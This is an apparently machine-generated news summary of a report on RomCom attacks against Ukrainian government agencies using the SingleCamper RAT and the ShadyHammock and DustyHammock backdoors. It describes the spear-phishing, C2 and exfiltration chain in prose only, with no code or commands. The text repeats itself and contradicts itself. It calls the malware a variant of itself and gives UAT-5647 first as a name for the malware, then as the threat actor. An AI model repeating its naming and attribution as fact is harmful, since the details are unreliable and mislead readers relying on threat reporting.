Ethical Hacking News
Russian RomCom has been linked to a new wave of cyber attacks targeting Ukrainian government agencies and unknown Polish entities using a variant of the SingleCamper RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0). The attack vector is characterized by spear-phishing messages that deliver a downloader containing ShadyHammock or DustyHammock backdoors, executing post-compromise activities including network reconnaissance and data exfiltration.
The RomCom threat actor has launched a new wave of attacks using a variant of the Remote Access Trojan (RAT) called SingleCamper.The attack vector involves spear-phishing messages with downloader payloads that deliver ShadyHammock and DustyHammock backdoors.ShadyHammock acts as a launchpad for SingleCamper and listens for incoming commands, while DustyHammock contacts a command-and-control (C2) server and runs arbitrary commands.The primary objective of SingleCamper is to execute post-compromise activities such as downloading PuTTY's Plink tool and exfiltrating data.RomCom has been linked to attacks on Ukrainian government agencies and unknown Polish entities since late 2023, using the UAT-5647 moniker for SingleCamper.The threat actor continues to evolve its tactics, techniques, and procedures (TTPs) with an aim to set up long-term persistence on compromised networks and exfiltrate data for espionage motives.
The cybersecurity world has recently witnessed a new wave of attacks attributed to the notorious threat actor known as RomCom. According to Cisco Talos, this latest campaign involves a variant of the RomCom Remote Access Trojan (RAT) dubbed SingleCamper (aka SnipBot or RomCom 5.0). The attack vector is characterized by the use of Spear-phishing messages, which deliver a downloader containing either ShadyHammock or DustyHammock backdoors.
In this elaborate scheme, ShadyHammock acts as a launchpad for SingleCamper while also listening for incoming commands. On the other hand, DustyHammock is engineered to contact a command-and-control (C2) server, run arbitrary commands, and download files from the server. The researchers noted that despite its additional features, ShadyHammock appears to be a predecessor to DustyHammock.
The primary objective of SingleCamper is to execute a wide range of post-compromise activities, including downloading PuTTY's Plink tool to establish remote tunnels with adversary-controlled infrastructure and network reconnaissance. This sophisticated attack vector entails lateral movement, user and system discovery, and data exfiltration. The researchers surmised that the attacks are part of UAT-5647's dual-pronged strategy: establishing long-term access and exfiltrating data for espionage motives, followed by potential pivot to ransomware deployment.
The threat actor has been engaged in multi-motivational operations since its emergence in 2022, including ransomware, extortion, and targeted credential gathering. Notably, RomCom has expanded its tooling and infrastructure to support a wide variety of malware components authored in diverse languages and platforms such as C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).
Furthermore, the attack chains begin with spear-phishing messages that deliver a downloader — either coded in C++ or Rust — which serves to deploy ShadyHammock and DustyHammock backdoors, respectively. In parallel, a decoy document is displayed to the recipient to maintain the ruse.
The researchers observed that despite its additional features, it's believed that ShadyHammock is a predecessor to DustyHammock, given the fact that the latter was observed in attacks as recently as September 2024.
To date, RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since late 2023. The intrusions are characterized by the use of SingleCamper, which is monitored under the moniker UAT-5647.
In light of this latest attack vector, it's clear that RomCom continues to evolve its tactics, techniques, and procedures (TTPs) with an aim to set up long-term persistence on compromised networks and exfiltrate data for espionage motives. As such, cybersecurity professionals must remain vigilant in monitoring these attacks and developing strategies to counter the threat actor.
Related Information:
https://thehackernews.com/2024/10/russian-romcom-attacks-target-ukrainian.html
https://www.linkedin.com/posts/dps-privacy-advisors_russian-romcom-attacks-target-ukrainian-government-activity-7252719546074075137-uV80
Published: Thu Oct 17 12:49:45 2024 by llama3.2 3B Q4_K_M
